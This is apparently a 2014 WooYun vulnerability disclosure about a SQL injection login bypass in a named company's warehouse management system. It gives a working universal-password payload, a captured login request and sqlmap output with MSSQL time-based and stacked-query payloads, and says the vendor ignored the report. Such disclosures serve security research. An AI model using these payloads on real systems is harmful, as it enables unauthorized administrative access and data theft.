好丽友某管理系统存在万能密码漏洞导致信息泄露

漏洞概要

缺陷编号:WooYun-2014-053887

漏洞标题:好丽友某管理系统存在万能密码漏洞导致信息泄露

相关厂商:orion.com.cn

漏洞作者:Mr.leo

提交时间:2014-03-24 16:29

公开时间:2014-03-29 16:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

Tags标签:

漏洞详情

披露状态:

2014-03-24: 细节已通知厂商并且等待厂商处理中
2014-03-24: 厂商已查看当前漏洞内容,细节仅向厂商公开
2014-03-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

偶然发现的sql注入~~好丽友某管理系统存在万能密码漏洞导致信息泄露

详细说明:

http://wms.orion.com.cn/login.aspx WMS仓储管理系统登录密码处没有过滤,导致直接绕过,登录管理后台。用户名11 密码' or 1=1 or ''='查看源代码可以看出用户名处是做了过滤的。

登录后是超级管理员,啥都能干了,查询、添加、删除、修改

burp抓包POST http://wms.orion.com.cn/login.aspx HTTP/1.1Host: wms.orion.com.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://wms.orion.com.cn/login.aspxConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 211__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMcN3IkfooEnAiZg5n4QHxOFpWcl9kICU6XQsEMaijHCT&txtLoginName=1&txtPassword=1&ImageButton1.x=44&ImageButton1.y=33sqlmap跑一下sqlmap identified the following injection points with a total of 87 HTTP(s) reqests:---Place: POSTParameter: txtPasswordType: stacked queriesTitle: Microsoft SQL Server/Sybase stacked queriesPayload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb30QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMcN3IkfooEnAiZg5n4QHxOFpWcl9kICU6XQsEMaijHCT&ttLoginName=1&txtPassword=1'; WAITFOR DELAY '0:0:5';--&ImageButton1.x=44&ImageButon1.y=33Type: AND/OR time-based blindTitle: Microsoft SQL Server/Sybase time-based blindPayload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb30QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMcN3IkfooEnAiZg5n4QHxOFpWcl9kICU6XQsEMaijHCT&ttLoginName=1&txtPassword=1' WAITFOR DELAY '0:0:5'--&ImageButton1.x=44&ImageButtn1.y=33---[16:36:59] [INFO] testing MySQL[16:36:59] [WARNING] it is very important not to stress the network adapter's bndwidth during usage of time-based queries[16:37:08] [WARNING] the back-end DBMS is not MySQL[16:37:08] [INFO] testing Oracle[16:37:17] [WARNING] the back-end DBMS is not Oracle[16:37:17] [INFO] testing PostgreSQL[16:37:26] [WARNING] the back-end DBMS is not PostgreSQL[16:37:26] [INFO] testing Microsoft SQL Server[16:37:45] [INFO] confirming Microsoft SQL Server[16:38:23] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows Vistaweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2000用户是sa,13个表,时间注入的,太慢了,不跑了。

漏洞证明:

已经证明。

修复方案:

过滤所有可能的参数。

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-03-2916:29

厂商回复:

最新状态:

暂无

评价

  1. 2010-01-01 00:00 疯狗 白帽子 | Rank:22 漏洞数:2)

    好丽友是出基友派的那个厂商么?

  2. 2010-01-01 00:00 Mr.leo 白帽子 | Rank:932 漏洞数:80)

    @疯狗 貌似是的,狗哥吃过没?

  3. 2010-01-01 00:00 疯狗 白帽子 | Rank:22 漏洞数:2)

    @Mr.leo 刚刚还在吃

  4. 2010-01-01 00:00 zzR 白帽子 | Rank:1179 漏洞数:101)

    好基友来了